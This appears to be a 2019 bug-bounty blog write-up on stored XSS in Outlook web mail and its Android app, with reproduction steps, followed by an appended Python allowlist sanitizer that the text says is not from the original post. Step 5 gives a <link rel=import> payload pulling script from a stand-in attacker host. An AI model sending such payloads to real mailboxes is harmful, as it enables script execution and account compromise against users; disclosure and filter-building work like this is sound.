ElMahdi Mrhassel
Nov 28, 2019 · 2 min read

Hello. This is my first write-up, and I will write about my first bug in Outlook.
Some services, such as Gmail, Outlook, Yahoo, etc., allow sending messages with HTML content [ Content-Type: text/html ] to an e-mail address on those services, but they filter the message content and only allow some tags, such as A, H1, img, etc.
But when I tested whether Outlook was filtering the message content well, I found that it was not: it did not filter the link tag, which allows an attacker to fetch an external file containing JavaScript or HTML code and execute it in the victim's browser.

Steps To Reproduce :

1. Go to https://emkei.cz/ ( I use this site to send messages because it allows me to send messages with Content-Type "text/html" )
2. Enter anything in ( From E-Name, From E-mail and Subject )
3. Enter your test Hotmail e-mail address in the ( To ) input
4. Click on text/html under Content-Type
5. Put ( <link rel=import href=https://Evilcom/filepayload> ) in the ( Text ) input and submit
6. Sign in to your test Hotmail e-mail account
7. Click on the message, and the payload will be executed!

Proof Of Concept :

Bug 2 : XSS Stored In com.microsoft.office.outlook

After they fixed the first bug, I downloaded their Android application [ com.microsoft.office.outlook ] and tried sending a message containing a simple XSS payload the same way as before. The surprising thing is that the message was not filtered at all, and all HTML tags were printed without filtering.
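
An allowlist filter of the kind described above, as an added example that is not code from this write-up or from Outlook: it rebuilds the message from permitted tags only, so the link import payload from the first bug and the unfiltered markup from Bug 2 are both dropped. The allowlist beyond A, H1 and img, and the names sanitize, MailSanitizer, safe_url and SAMPLE, are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for illustration; the post only names A, H1 and img.
ALLOWED = {"a": {"href"}, "h1": set(), "img": {"src", "alt"}, "p": set(), "br": set()}
VOID = {"br", "img"}                      # elements that take no closing tag
DROP_WITH_CONTENT = {"script", "style"}   # their text must not leak into the output
SAFE_SCHEMES = {"http", "https", "mailto"}
# Constructed sample message (not from the post), carrying the post's <link> payload.
SAMPLE = ('<h1>Hi</h1><link rel=import href=https://Evilcom/filepayload>'
          '<a href="https://example.com/" onclick="x()">site</a><script>x()</script>')

def safe_url(value):
    # Allowlist on the scheme; relative, javascript: and malformed URLs fail closed.
    return value.strip().split(":", 1)[0].lower() in SAFE_SCHEMES

class MailSanitizer(HTMLParser):
    """Re-emits allowlisted tags and attributes only; everything else is dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.removed, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        self._skip += tag in DROP_WITH_CONTENT
        if tag not in ALLOWED or self._skip:
            self.removed.append(tag)      # e.g. <link rel=import ...>
            return
        kept = ""
        for name, value in attrs:
            ok = name in ALLOWED[tag] and value is not None
            if ok and (name not in ("href", "src") or safe_url(value)):
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT and self._skip:
            self._skip -= 1
        elif tag in ALLOWED and tag not in VOID and not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))  # text is always re-escaped

def sanitize(html_body):
    """Return (clean_html, list_of_removed_tag_names)."""
    parser = MailSanitizer()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.removed
```

Calling sanitize(SAMPLE) returns the cleaned markup together with the list of removed tag names, which can be logged to spot messages that carried disallowed tags.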
